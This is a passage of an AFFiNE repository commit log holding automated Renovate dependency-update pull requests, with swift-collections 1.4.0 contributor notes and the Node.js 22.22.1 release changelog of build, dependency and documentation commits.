[#&#8203;581](https://redirect.github.com/apple/swift-collections/pull/581)
- \[BitSet] Amend return value of `update(with:)` method by
[@&#8203;benrimmington](https://redirect.github.com/benrimmington) in
[#&#8203;538](https://redirect.github.com/apple/swift-collections/pull/538)
- \[BasicContainers] Fix spelling of a source file by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;585](https://redirect.github.com/apple/swift-collections/pull/585)
- Include notes about index mutation in `span(after/before:)` (+ other
doc fixes) by
[@&#8203;natecook1000](https://redirect.github.com/natecook1000) in
[#&#8203;541](https://redirect.github.com/apple/swift-collections/pull/541)
- \[BasicContainers] Finalize requirements for hashed containers by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;586](https://redirect.github.com/apple/swift-collections/pull/586)
- Update README for 1.4.0 by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;587](https://redirect.github.com/apple/swift-collections/pull/587)
- Working towards the 1.4.0 tag by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;588](https://redirect.github.com/apple/swift-collections/pull/588)
- \[BasicContainers] Avoid defining set/dictionary types unless
UnstableHashedContainers is enabled by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;589](https://redirect.github.com/apple/swift-collections/pull/589)
- \[BasicContainers] RigidArray: Correct spelling of replacement for
deprecated method by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;590](https://redirect.github.com/apple/swift-collections/pull/590)

#### New Contributors

- [@&#8203;incertum](https://redirect.github.com/incertum) made their
first contribution in
[#&#8203;540](https://redirect.github.com/apple/swift-collections/pull/540)
- [@&#8203;SiliconA-Z](https://redirect.github.com/SiliconA-Z) made
their first contribution in
[#&#8203;553](https://redirect.github.com/apple/swift-collections/pull/553)
- [@&#8203;bkhouri](https://redirect.github.com/bkhouri) made their
first contribution in
[#&#8203;563](https://redirect.github.com/apple/swift-collections/pull/563)
- [@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot]
made their first contribution in
[#&#8203;577](https://redirect.github.com/apple/swift-collections/pull/577)
- [@&#8203;tayloraswift](https://redirect.github.com/tayloraswift) made
their first contribution in
[#&#8203;578](https://redirect.github.com/apple/swift-collections/pull/578)
- [@&#8203;benrimmington](https://redirect.github.com/benrimmington)
made their first contribution in
[#&#8203;538](https://redirect.github.com/apple/swift-collections/pull/538)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.3.0...1.4.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-09 12:31:54 +00:00
renovate[bot] 6d710f3bdc chore: bump up Node.js to v22.22.1 (#14598)
> ℹ️ **Note**
> 
> This PR body was truncated due to platform limits.

This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [node](https://nodejs.org)
([source](https://redirect.github.com/nodejs/node)) | patch | `22.22.0`
→ `22.22.1` |

---

### Release Notes

<details>
<summary>nodejs/node (node)</summary>

###
[`v22.22.1`](https://redirect.github.com/nodejs/node/releases/tag/v22.22.1):
2026-03-05, Version 22.22.1 &#x27;Jod&#x27; (LTS)

[Compare
Source](https://redirect.github.com/nodejs/node/compare/v22.22.0...v22.22.1)

##### Notable Changes

-
\[[`7b93a65f27`](https://redirect.github.com/nodejs/node/commit/7b93a65f27)]
- **build**: test on Python 3.14 (Christian Clauss)
[#&#8203;59983](https://redirect.github.com/nodejs/node/pull/59983)
-
\[[`6063d888fe`](https://redirect.github.com/nodejs/node/commit/6063d888fe)]
- **cli**: mark `--heapsnapshot-near-heap-limit` as stable (Joyee
Cheung)
[#&#8203;60956](https://redirect.github.com/nodejs/node/pull/60956)
-
\[[`d950b151a2`](https://redirect.github.com/nodejs/node/commit/d950b151a2)]
- **crypto**: update root certificates to NSS 3.119 (Node.js GitHub Bot)
[#&#8203;61419](https://redirect.github.com/nodejs/node/pull/61419)
-
\[[`4f42f8c428`](https://redirect.github.com/nodejs/node/commit/4f42f8c428)]
- **crypto**: update root certificates to NSS 3.117 (Node.js GitHub Bot)
[#&#8203;60741](https://redirect.github.com/nodejs/node/pull/60741)
-
\[[`b6ebf2cd53`](https://redirect.github.com/nodejs/node/commit/b6ebf2cd53)]
- **doc**: add avivkeller to collaborators (Aviv Keller)
[#&#8203;61115](https://redirect.github.com/nodejs/node/pull/61115)
-
\[[`35854f424d`](https://redirect.github.com/nodejs/node/commit/35854f424d)]
- **doc**: add gurgunday to collaborators (Gürgün Dayıoğlu)
[#&#8203;61094](https://redirect.github.com/nodejs/node/pull/61094)
-
\[[`5c6a076e5d`](https://redirect.github.com/nodejs/node/commit/5c6a076e5d)]
- **meta**: add Renegade334 to collaborators (Renegade334)
[#&#8203;60714](https://redirect.github.com/nodejs/node/pull/60714)

##### Commits

-
\[[`5f773488c2`](https://redirect.github.com/nodejs/node/commit/5f773488c2)]
- **assert**: use a set instead of an array for faster lookup (Ruben
Bridgewater)
[#&#8203;61076](https://redirect.github.com/nodejs/node/pull/61076)
-
\[[`feecbb0eab`](https://redirect.github.com/nodejs/node/commit/feecbb0eab)]
- **assert,util**: fix deep comparison for sets and maps with mixed
types (Ruben Bridgewater)
[#&#8203;61388](https://redirect.github.com/nodejs/node/pull/61388)
-
\[[`096095b127`](https://redirect.github.com/nodejs/node/commit/096095b127)]
- **benchmark**: add SQLite benchmarks (Guilherme Araújo)
[#&#8203;61401](https://redirect.github.com/nodejs/node/pull/61401)
-
\[[`b5fe481415`](https://redirect.github.com/nodejs/node/commit/b5fe481415)]
- **benchmark**: use boolean options in benchmark tests (SeokhunEom)
[#&#8203;60129](https://redirect.github.com/nodejs/node/pull/60129)
-
\[[`fa9faacacb`](https://redirect.github.com/nodejs/node/commit/fa9faacacb)]
- **benchmark**: allow boolean option values (SeokhunEom)
[#&#8203;60129](https://redirect.github.com/nodejs/node/pull/60129)
-
\[[`ba8714ac21`](https://redirect.github.com/nodejs/node/commit/ba8714ac21)]
- **benchmark**: fix incorrect base64 input in byteLength benchmark
(semimikoh)
[#&#8203;60841](https://redirect.github.com/nodejs/node/pull/60841)
-
\[[`53596de876`](https://redirect.github.com/nodejs/node/commit/53596de876)]
- **benchmark**: use typescript for import cjs benchmark (Joyee Cheung)
[#&#8203;60663](https://redirect.github.com/nodejs/node/pull/60663)
-
\[[`e8930e9d7c`](https://redirect.github.com/nodejs/node/commit/e8930e9d7c)]
- **benchmark**: focus on import.meta intialization in import-meta
benchmark (Joyee Cheung)
[#&#8203;60603](https://redirect.github.com/nodejs/node/pull/60603)
-
\[[`1155e412b1`](https://redirect.github.com/nodejs/node/commit/1155e412b1)]
- **benchmark**: add per-suite setup option (Joyee Cheung)
[#&#8203;60574](https://redirect.github.com/nodejs/node/pull/60574)
-
\[[`e01903d304`](https://redirect.github.com/nodejs/node/commit/e01903d304)]
- **benchmark**: improve cpu.sh for safety and usability (Nam Yooseong)
[#&#8203;60162](https://redirect.github.com/nodejs/node/pull/60162)
-
\[[`623a405747`](https://redirect.github.com/nodejs/node/commit/623a405747)]
- **benchmark**: add benchmark for leaf source text modules (Joyee
Cheung)
[#&#8203;60205](https://redirect.github.com/nodejs/node/pull/60205)
-
\[[`7f5e7b9f7f`](https://redirect.github.com/nodejs/node/commit/7f5e7b9f7f)]
- **benchmark**: add microbench on isInsideNodeModules (Chengzhong Wu)
[#&#8203;60991](https://redirect.github.com/nodejs/node/pull/60991)
-
\[[`db132b85a8`](https://redirect.github.com/nodejs/node/commit/db132b85a8)]
- **bootstrap**: initialize http proxy after user module loader setup
(Joyee Cheung)
[#&#8203;58938](https://redirect.github.com/nodejs/node/pull/58938)
-
\[[`66aab9f987`](https://redirect.github.com/nodejs/node/commit/66aab9f987)]
- **buffer**: let Buffer.of use heap (Сковорода Никита Андреевич)
[#&#8203;60503](https://redirect.github.com/nodejs/node/pull/60503)
-
\[[`c3cf00c671`](https://redirect.github.com/nodejs/node/commit/c3cf00c671)]
- **buffer**: speed up concat via TypedArray#set (Gürgün Dayıoğlu)
[#&#8203;60399](https://redirect.github.com/nodejs/node/pull/60399)
-
\[[`f6fad231e9`](https://redirect.github.com/nodejs/node/commit/f6fad231e9)]
- **build**: skip sscache action on non-main branches (Joyee Cheung)
[#&#8203;61790](https://redirect.github.com/nodejs/node/pull/61790)
-
\[[`2145f91f6b`](https://redirect.github.com/nodejs/node/commit/2145f91f6b)]
- **build**: update android-patches/trap-handler.h.patch (Mo Luo)
[#&#8203;60369](https://redirect.github.com/nodejs/node/pull/60369)
-
\[[`5b49759dd8`](https://redirect.github.com/nodejs/node/commit/5b49759dd8)]
- **build**: update devcontainer.json to use paired nix env (Joyee
Cheung)
[#&#8203;61414](https://redirect.github.com/nodejs/node/pull/61414)
-
\[[`24724cde40`](https://redirect.github.com/nodejs/node/commit/24724cde40)]
- **build**: fix misplaced comma in ldflags (hqzing)
[#&#8203;61294](https://redirect.github.com/nodejs/node/pull/61294)
-
\[[`c57a19934e`](https://redirect.github.com/nodejs/node/commit/c57a19934e)]
- **build**: fix crate vendor file checksums on windows (Chengzhong Wu)
[#&#8203;61329](https://redirect.github.com/nodejs/node/pull/61329)
-
\[[`8659d7cd07`](https://redirect.github.com/nodejs/node/commit/8659d7cd07)]
- **build**: fix inconsistent quoting in `Makefile` (Antoine du Hamel)
[#&#8203;60511](https://redirect.github.com/nodejs/node/pull/60511)
-
\[[`44f339b315`](https://redirect.github.com/nodejs/node/commit/44f339b315)]
- **build**: remove temporal updater (Chengzhong Wu)
[#&#8203;61151](https://redirect.github.com/nodejs/node/pull/61151)
-
\[[`d60a6cebd5`](https://redirect.github.com/nodejs/node/commit/d60a6cebd5)]
- **build**: update test-wpt-report to use NODE instead of OUT\_NODE
(Filip Skokan)
[#&#8203;61024](https://redirect.github.com/nodejs/node/pull/61024)
-
\[[`34ccf187f5`](https://redirect.github.com/nodejs/node/commit/34ccf187f5)]
- **build**: skip build-ci on actions with a separate test step
(Chengzhong Wu)
[#&#8203;61073](https://redirect.github.com/nodejs/node/pull/61073)
-
\[[`7b19e101a2`](https://redirect.github.com/nodejs/node/commit/7b19e101a2)]
- **build**: run embedtest with node\_g when BUILDTYPE=Debug (Chengzhong
Wu) [#&#8203;60850](https://redirect.github.com/nodejs/node/pull/60850)
-
\[[`9408c4459f`](https://redirect.github.com/nodejs/node/commit/9408c4459f)]
- **build**: upgrade Python linter ruff, add rules ASYNC,PERF (Christian
Clauss)
[#&#8203;59984](https://redirect.github.com/nodejs/node/pull/59984)
-
\[[`2166ec7f0f`](https://redirect.github.com/nodejs/node/commit/2166ec7f0f)]
- **build**: use call command when calling python configure (Jacob
Nichols)
[#&#8203;60098](https://redirect.github.com/nodejs/node/pull/60098)
-
\[[`73ef70145d`](https://redirect.github.com/nodejs/node/commit/73ef70145d)]
- **build**: remove V8\_COMPRESS\_POINTERS\_IN\_ISOLATE\_CAGE defs
(Joyee Cheung)
[#&#8203;60296](https://redirect.github.com/nodejs/node/pull/60296)
-
\[[`7b93a65f27`](https://redirect.github.com/nodejs/node/commit/7b93a65f27)]
- **build**: test on Python 3.14 (Christian Clauss)
[#&#8203;59983](https://redirect.github.com/nodejs/node/pull/59983)
-
\[[`508ce6ec6c`](https://redirect.github.com/nodejs/node/commit/508ce6ec6c)]
- **build, src**: fix include paths for vtune files (Rahul)
[#&#8203;59999](https://redirect.github.com/nodejs/node/pull/59999)
-
\[[`c89d3cd570`](https://redirect.github.com/nodejs/node/commit/c89d3cd570)]
- **build,tools**: fix addon build deadlock on errors (Vladimir Morozov)
[#&#8203;61321](https://redirect.github.com/nodejs/node/pull/61321)
-
\[[`40904a0591`](https://redirect.github.com/nodejs/node/commit/40904a0591)]
- **build,win**: update WinGet configurations to Python 3.14 (Mike
McCready)
[#&#8203;61431](https://redirect.github.com/nodejs/node/pull/61431)
-
\[[`6d6742e7db`](https://redirect.github.com/nodejs/node/commit/6d6742e7db)]
- **child\_process**: treat ipc length header as unsigned uint32 (Ryuhei
Shima)
[#&#8203;61344](https://redirect.github.com/nodejs/node/pull/61344)
-
\[[`6063d888fe`](https://redirect.github.com/nodejs/node/commit/6063d888fe)]
- **cli**: mark --heapsnapshot-near-heap-limit as stable (Joyee Cheung)
[#&#8203;60956](https://redirect.github.com/nodejs/node/pull/60956)
-
\[[`3d324a0f88`](https://redirect.github.com/nodejs/node/commit/3d324a0f88)]
- **cluster**: fix port reuse between cluster (Ryuhei Shima)
[#&#8203;60141](https://redirect.github.com/nodejs/node/pull/60141)
-
\[[`40a58709b4`](https://redirect.github.com/nodejs/node/commit/40a58709b4)]
- **console**: optimize single-string logging (Gürgün Dayıoğlu)
[#&#8203;60422](https://redirect.github.com/nodejs/node/pull/60422)
-
\[[`d950b151a2`](https://redirect.github.com/nodejs/node/commit/d950b151a2)]
- **crypto**: update root certificates to NSS 3.119 (Node.js GitHub Bot)
[#&#8203;61419](https://redirect.github.com/nodejs/node/pull/61419)
-
\[[`4f42f8c428`](https://redirect.github.com/nodejs/node/commit/4f42f8c428)]
- **crypto**: update root certificates to NSS 3.117 (Node.js GitHub Bot)
[#&#8203;60741](https://redirect.github.com/nodejs/node/pull/60741)
-
\[[`a87499ae25`](https://redirect.github.com/nodejs/node/commit/a87499ae25)]
- **crypto**: ensure documented RSA-PSS saltLength default is used
(Filip Skokan)
[#&#8203;60662](https://redirect.github.com/nodejs/node/pull/60662)
-
\[[`8c65cc11e2`](https://redirect.github.com/nodejs/node/commit/8c65cc11e2)]
- **crypto**: update root certificates to NSS 3.116 (Node.js GitHub Bot)
[#&#8203;59956](https://redirect.github.com/nodejs/node/pull/59956)
-
\[[`91dc00a2c1`](https://redirect.github.com/nodejs/node/commit/91dc00a2c1)]
- **debugger**: fix event listener leak in the run command (Joyee
Cheung)
[#&#8203;60464](https://redirect.github.com/nodejs/node/pull/60464)
-
\[[`0781bd3764`](https://redirect.github.com/nodejs/node/commit/0781bd3764)]
- **deps**: V8: backport
[`6a0a25a`](https://redirect.github.com/nodejs/node/commit/6a0a25abaed3)
(Vivian Wang)
[#&#8203;61688](https://redirect.github.com/nodejs/node/pull/61688)
-
\[[`0cf1f9c3e9`](https://redirect.github.com/nodejs/node/commit/0cf1f9c3e9)]
- **deps**: update googletest to
[`8508785`](https://redirect.github.com/nodejs/node/commit/85087857ad10bd407cd6ed2f52f7ea9752db621f)
(Node.js GitHub Bot)
[#&#8203;61417](https://redirect.github.com/nodejs/node/pull/61417)
-
\[[`521b4b1f07`](https://redirect.github.com/nodejs/node/commit/521b4b1f07)]
- **deps**: update sqlite to 3.51.2 (Node.js GitHub Bot)
[#&#8203;61339](https://redirect.github.com/nodejs/node/pull/61339)
-
\[[`58b9d219a3`](https://redirect.github.com/nodejs/node/commit/58b9d219a3)]
- **deps**: update icu to 78.2 (Node.js GitHub Bot)
[#&#8203;60523](https://redirect.github.com/nodejs/node/pull/60523)
-
\[[`cbc1e4306d`](https://redirect.github.com/nodejs/node/commit/cbc1e4306d)]
- **deps**: update zlib to 1.3.1-e00f703 (Node.js GitHub Bot)
[#&#8203;61135](https://redirect.github.com/nodejs/node/pull/61135)
-
\[[`db59c35ed8`](https://redirect.github.com/nodejs/node/commit/db59c35ed8)]
- **deps**: update cjs-module-lexer to 2.2.0 (Node.js GitHub Bot)
[#&#8203;61271](https://redirect.github.com/nodejs/node/pull/61271)
-
\[[`c18518ee3c`](https://redirect.github.com/nodejs/node/commit/c18518ee3c)]
- **deps**: update nbytes to 0.1.2 (Node.js GitHub Bot)
[#&#8203;61270](https://redirect.github.com/nodejs/node/pull/61270)
-
\[[`376df62d63`](https://redirect.github.com/nodejs/node/commit/376df62d63)]
- **deps**: update timezone to 2025c (Node.js GitHub Bot)
[#&#8203;61138](https://redirect.github.com/nodejs/node/pull/61138)
-
\[[`993e905302`](https://redirect.github.com/nodejs/node/commit/993e905302)]
- **deps**: update simdjson to 4.2.4 (Node.js GitHub Bot)
[#&#8203;61056](https://redirect.github.com/nodejs/node/pull/61056)
-
\[[`b72fd2a5d3`](https://redirect.github.com/nodejs/node/commit/b72fd2a5d3)]
- **deps**: update googletest to
[`065127f`](https://redirect.github.com/nodejs/node/commit/065127f1e4b46c5f14fc73cf8d323c221f9dc68e)
(Node.js GitHub Bot)
[#&#8203;61055](https://redirect.github.com/nodejs/node/pull/61055)
-
\[[`d765147405`](https://redirect.github.com/nodejs/node/commit/d765147405)]
- **deps**: update sqlite to 3.51.1 (Node.js GitHub Bot)
[#&#8203;60899](https://redirect.github.com/nodejs/node/pull/60899)
-
\[[`37abe2a7d2`](https://redirect.github.com/nodejs/node/commit/37abe2a7d2)]
- **deps**: update zlib to 1.3.1-63d7e16 (Node.js GitHub Bot)
[#&#8203;60898](https://redirect.github.com/nodejs/node/pull/60898)
-
\[[`97241fcb86`](https://redirect.github.com/nodejs/node/commit/97241fcb86)]
- **deps**: update sqlite to 3.51.0 (Node.js GitHub Bot)
[#&#8203;60614](https://redirect.github.com/nodejs/node/pull/60614)
-
\[[`3669c7b4f4`](https://redirect.github.com/nodejs/node/commit/3669c7b4f4)]
- **deps**: update simdjson to 4.2.2 (Node.js GitHub Bot)
[#&#8203;60740](https://redirect.github.com/nodejs/node/pull/60740)
-
\[[`9a056ec89c`](https://redirect.github.com/nodejs/node/commit/9a056ec89c)]
- **deps**: update googletest to
[`1b96fa1`](https://redirect.github.com/nodejs/node/commit/1b96fa13f549387b7549cc89e1a785cf143a1a50)
(Node.js GitHub Bot)
[#&#8203;60739](https://redirect.github.com/nodejs/node/pull/60739)
-
\[[`b5803b3ea0`](https://redirect.github.com/nodejs/node/commit/b5803b3ea0)]
- **deps**: update minimatch to 10.1.1 (Node.js GitHub Bot)
[#&#8203;60543](https://redirect.github.com/nodejs/node/pull/60543)
-
\[[`5bf99f3d46`](https://redirect.github.com/nodejs/node/commit/5bf99f3d46)]
- **deps**: update cjs-module-lexer to 2.1.1 (Node.js GitHub Bot)
[#&#8203;60646](https://redirect.github.com/nodejs/node/pull/60646)
-
\[[`801f187357`](https://redirect.github.com/nodejs/node/commit/801f187357)]
- **deps**: update simdjson to 4.2.1 (Node.js GitHub Bot)
[#&#8203;60644](https://redirect.github.com/nodejs/node/pull/60644)
-
\[[`03c16e5a4c`](https://redirect.github.com/nodejs/node/commit/03c16e5a4c)]
- **deps**: update simdjson to 4.1.0 (Node.js GitHub Bot)
[#&#8203;60542](https://redirect.github.com/nodejs/node/pull/60542)
-
\[[`2ebfc2ca56`](https://redirect.github.com/nodejs/node/commit/2ebfc2ca56)]
- **deps**: update amaro to 1.1.5 (Node.js GitHub Bot)
[#&#8203;60541](https://redirect.github.com/nodejs/node/pull/60541)
-
\[[`d24ba4fed6`](https://redirect.github.com/nodejs/node/commit/d24ba4fed6)]
- **deps**: update simdjson to 4.0.7 (Node.js GitHub Bot)
[#&#8203;59883](https://redirect.github.com/nodejs/node/pull/59883)
-
\[[`9480a139bf`](https://redirect.github.com/nodejs/node/commit/9480a139bf)]
- **deps**: update googletest to
[`279f847`](https://redirect.github.com/nodejs/node/commit/279f847)
(Node.js GitHub Bot)
[#&#8203;60219](https://redirect.github.com/nodejs/node/pull/60219)
-
\[[`635e67379e`](https://redirect.github.com/nodejs/node/commit/635e67379e)]
- **deps**: update archs files for openssl-3.5.5 (Node.js GitHub Bot)
[#&#8203;61547](https://redirect.github.com/nodejs/node/pull/61547)
-
\[[`c7b774047d`](https://redirect.github.com/nodejs/node/commit/c7b774047d)]
- **deps**: upgrade openssl sources to openssl-3.5.5 (Node.js GitHub
Bot) [#&#8203;61547](https://redirect.github.com/nodejs/node/pull/61547)
-
\[[`5b324d7d7f`](https://redirect.github.com/nodejs/node/commit/5b324d7d7f)]
- **deps**: update corepack to 0.34.6 (Node.js GitHub Bot)
[#&#8203;61510](https://redirect.github.com/nodejs/node/pull/61510)
-
\[[`eef8ba0667`](https://redirect.github.com/nodejs/node/commit/eef8ba0667)]
- **deps**: update corepack to 0.34.5 (Node.js GitHub Bot)
[#&#8203;60842](https://redirect.github.com/nodejs/node/pull/60842)
-
\[[`490f7c7fb1`](https://redirect.github.com/nodejs/node/commit/490f7c7fb1)]
- **deps**: update corepack to 0.34.4 (Node.js GitHub Bot)
[#&#8203;60643](https://redirect.github.com/nodejs/node/pull/60643)
-
\[[`66903ea3b3`](https://redirect.github.com/nodejs/node/commit/66903ea3b3)]
- **deps**: update corepack to 0.34.2 (Node.js GitHub Bot)
[#&#8203;60550](https://redirect.github.com/nodejs/node/pull/60550)
-
\[[`a2f0b69282`](https://redirect.github.com/nodejs/node/commit/a2f0b69282)]
- **deps**: update corepack to 0.34.1 (Node.js GitHub Bot)
[#&#8203;60314](https://redirect.github.com/nodejs/node/pull/60314)
-
\[[`c8044a48a6`](https://redirect.github.com/nodejs/node/commit/c8044a48a6)]
- **deps**: V8: backport
[`2e4c5cf`](https://redirect.github.com/nodejs/node/commit/2e4c5cf9b112)
(Michaël Zasso)
[#&#8203;60654](https://redirect.github.com/nodejs/node/pull/60654)
-
\[[`642f518198`](https://redirect.github.com/nodejs/node/commit/642f518198)]
- **doc**: supported toolchain with Visual Studio 2022 only (Mike
McCready)
[#&#8203;61451](https://redirect.github.com/nodejs/node/pull/61451)
-
\[[`625f674487`](https://redirect.github.com/nodejs/node/commit/625f674487)]
- **doc**: move Security-Team from TSC to SECURITY (Rafael Gonzaga)
[#&#8203;61495](https://redirect.github.com/nodejs/node/pull/61495)
-
\[[`029e32f8ba`](https://redirect.github.com/nodejs/node/commit/029e32f8ba)]
- **doc**: added `requestOCSP` option to `tls.connect` (ikeyan)
[#&#8203;61064](https://redirect.github.com/nodejs/node/pull/61064)
-
\[[`68e33dfa89`](https://redirect.github.com/nodejs/node/commit/68e33dfa89)]
- **doc**: restore
[@&#8203;ChALkeR](https://redirect.github.com/ChALkeR) to collaborators
(Сковорода Никита Андреевич)
[#&#8203;61553](https://redirect.github.com/nodejs/node/pull/61553)
-
\[[`e016770d62`](https://redirect.github.com/nodejs/node/commit/e016770d62)]
- **doc**: update IBM/Red Hat volunteers with dedicated project time
(Beth Griggs)
[#&#8203;61588](https://redirect.github.com/nodejs/node/pull/61588)
-
\[[`ec63954657`](https://redirect.github.com/nodejs/node/commit/ec63954657)]
- **doc**: mention constructor comparison in assert.deepStrictEqual
(Hamza Kargin)
[#&#8203;60253](https://redirect.github.com/nodejs/node/pull/60253)
-
\[[`c8e1563a98`](https://redirect.github.com/nodejs/node/commit/c8e1563a98)]
- **doc**: add CVE delay mention (Rafael Gonzaga)
[#&#8203;61465](https://redirect.github.com/nodejs/node/pull/61465)
-
\[[`4b00cf2b54`](https://redirect.github.com/nodejs/node/commit/4b00cf2b54)]
- **doc**: include OpenJSF handle for security stewards (Rafael Gonzaga)
[#&#8203;61454](https://redirect.github.com/nodejs/node/pull/61454)
-
\[[`4b73bf5bc8`](https://redirect.github.com/nodejs/node/commit/4b73bf5bc8)]
- **doc**: clarify process.argv\[1] behavior for -e/--eval (Jeevankumar
S) [#&#8203;61366](https://redirect.github.com/nodejs/node/pull/61366)
-
\[[`d3151df4b3`](https://redirect.github.com/nodejs/node/commit/d3151df4b3)]
- **doc**: remove Windows Dev Home instructions from BUILDING (Mike
McCready)
[#&#8203;61434](https://redirect.github.com/nodejs/node/pull/61434)
-
\[[`2323462e35`](https://redirect.github.com/nodejs/node/commit/2323462e35)]
- **doc**: clarify TypedArray properties on Buffer (Roman Reiss)
[#&#8203;61355](https://redirect.github.com/nodejs/node/pull/61355)
-
\[[`6c5478c8b2`](https://redirect.github.com/nodejs/node/commit/6c5478c8b2)]
- **doc**: note resume build should not be done on node-test-commit
(Stewart X Addison)
[#&#8203;61373](https://redirect.github.com/nodejs/node/pull/61373)
-
\[[`ba4a043103`](https://redirect.github.com/nodejs/node/commit/ba4a043103)]
- **doc**: refine WebAssembly error documentation (sangwook)
[#&#8203;61382](https://redirect.github.com/nodejs/node/pull/61382)
-
\[[`cd315ea589`](https://redirect.github.com/nodejs/node/commit/cd315ea589)]
- **doc**: add deprecation history for url.parse (Eng Zer Jun)
[#&#8203;61389](https://redirect.github.com/nodejs/node/pull/61389)
-
\[[`42db0c392d`](https://redirect.github.com/nodejs/node/commit/42db0c392d)]
- **doc**: add marco and rafael in last sec release (Marco Ippolito)
[#&#8203;61383](https://redirect.github.com/nodejs/node/pull/61383)
-
\[[`4c3b680fc7`](https://redirect.github.com/nodejs/node/commit/4c3b680fc7)]
- **doc**: packages: example of private import switch to internal
(coderaiser)
[#&#8203;61343](https://redirect.github.com/nodejs/node/pull/61343)
-
\[[`684d15e421`](https://redirect.github.com/nodejs/node/commit/684d15e421)]
- **doc**: add esm and cjs examples to node:v8 (Alfredo González)
[#&#8203;61328](https://redirect.github.com/nodejs/node/pull/61328)
-
\[[`c3f9c7a7d9`](https://redirect.github.com/nodejs/node/commit/c3f9c7a7d9)]
- **doc**: added 'secure' event to tls.TLSSocket (ikeyan)
[#&#8203;61066](https://redirect.github.com/nodejs/node/pull/61066)
-
\[[`aa9acad5ca`](https://redirect.github.com/nodejs/node/commit/aa9acad5ca)]
- **doc**: restore
[@&#8203;watilde](https://redirect.github.com/watilde) to collaborators
(Daijiro Wachi)
[#&#8203;61350](https://redirect.github.com/nodejs/node/pull/61350)
-
\[[`9cafec084e`](https://redirect.github.com/nodejs/node/commit/9cafec084e)]
- **doc**: run license-builder (github-actions\[bot])
[#&#8203;61348](https://redirect.github.com/nodejs/node/pull/61348)
-
\[[`cdb12ccbc6`](https://redirect.github.com/nodejs/node/commit/cdb12ccbc6)]
- **doc**: document ALPNCallback option for TLSSocket constructor
(ikeyan)
[#&#8203;61331](https://redirect.github.com/nodejs/node/pull/61331)
-
\[[`461c5e65c5`](https://redirect.github.com/nodejs/node/commit/461c5e65c5)]
- **doc**: update MDN links (Livia Medeiros)
[#&#8203;61062](https://redirect.github.com/nodejs/node/pull/61062)
-
\[[`dde45baeab`](https://redirect.github.com/nodejs/node/commit/dde45baeab)]
- **doc**: add documentation for process.traceProcessWarnings (Alireza
Ebrahimkhani)
[#&#8203;53641](https://redirect.github.com/nodejs/node/pull/53641)
-
\[[`59a7aeec92`](https://redirect.github.com/nodejs/node/commit/59a7aeec92)]
- **doc**: fix filename typo (Hardanish Singh)
[#&#8203;61297](https://redirect.github.com/nodejs/node/pull/61297)
-
\[[`9a0a40d1ed`](https://redirect.github.com/nodejs/node/commit/9a0a40d1ed)]
- **doc**: fix typos and grammar in `BUILDING.md` & `onboarding.md`
(Hardanish Singh)
[#&#8203;61267](https://redirect.github.com/nodejs/node/pull/61267)
-
\[[`dca7005f9d`](https://redirect.github.com/nodejs/node/commit/dca7005f9d)]
- **doc**: mention --newVersion release script (Rafael Gonzaga)
[#&#8203;61255](https://redirect.github.com/nodejs/node/pull/61255)
-
\[[`c0dc8ddf85`](https://redirect.github.com/nodejs/node/commit/c0dc8ddf85)]
- **doc**: correct typo in api contributing doc (Mike McCready)
[#&#8203;61260](https://redirect.github.com/nodejs/node/pull/61260)
-
\[[`066af38fe1`](https://redirect.github.com/nodejs/node/commit/066af38fe1)]
- **doc**: add PR-URL requirement for security backports (Rafael
Gonzaga)
[#&#8203;61256](https://redirect.github.com/nodejs/node/pull/61256)
-
\[[`71dd46bd0c`](https://redirect.github.com/nodejs/node/commit/71dd46bd0c)]
- **doc**: add reusePort error behavior to net module (mag123c)
[#&#8203;61250](https://redirect.github.com/nodejs/node/pull/61250)
-
\[[`f6abe3ba33`](https://redirect.github.com/nodejs/node/commit/f6abe3ba33)]
- **doc**: note corepack package removal in distribution doc (Mike
McCready)
[#&#8203;61207](https://redirect.github.com/nodejs/node/pull/61207)
-
\[[`9059d49d8c`](https://redirect.github.com/nodejs/node/commit/9059d49d8c)]
- **doc**: fix tls.connect() timeout documentation (Azad Gupta)
[#&#8203;61079](https://redirect.github.com/nodejs/node/pull/61079)
-
\[[`e7b34b76b0`](https://redirect.github.com/nodejs/node/commit/e7b34b76b0)]
- **doc**: missing `passed`, `error` and `passed` properties on
`TestContext` (Xavier Stouder)
[#&#8203;61185](https://redirect.github.com/nodejs/node/pull/61185)
-
\[[`9ae2dcfbb6`](https://redirect.github.com/nodejs/node/commit/9ae2dcfbb6)]
- **doc**: clarify threat model for application-level API exposure
(Rafael Gonzaga)
[#&#8203;61184](https://redirect.github.com/nodejs/node/pull/61184)
-
\[[`9902331a7c`](https://redirect.github.com/nodejs/node/commit/9902331a7c)]
- **doc**: correct options for net.Socket class and socket.connect
(Xavier Stouder)
[#&#8203;61179](https://redirect.github.com/nodejs/node/pull/61179)
-
\[[`a80122d2fe`](https://redirect.github.com/nodejs/node/commit/a80122d2fe)]
- **doc**: document error event on readline InterfaceConstructor (Xavier
Stouder)
[#&#8203;61170](https://redirect.github.com/nodejs/node/pull/61170)
-
\[[`38d73c9cfa`](https://redirect.github.com/nodejs/node/commit/38d73c9cfa)]
- **doc**: add a smooth scrolling effect to the sidebar (btea)
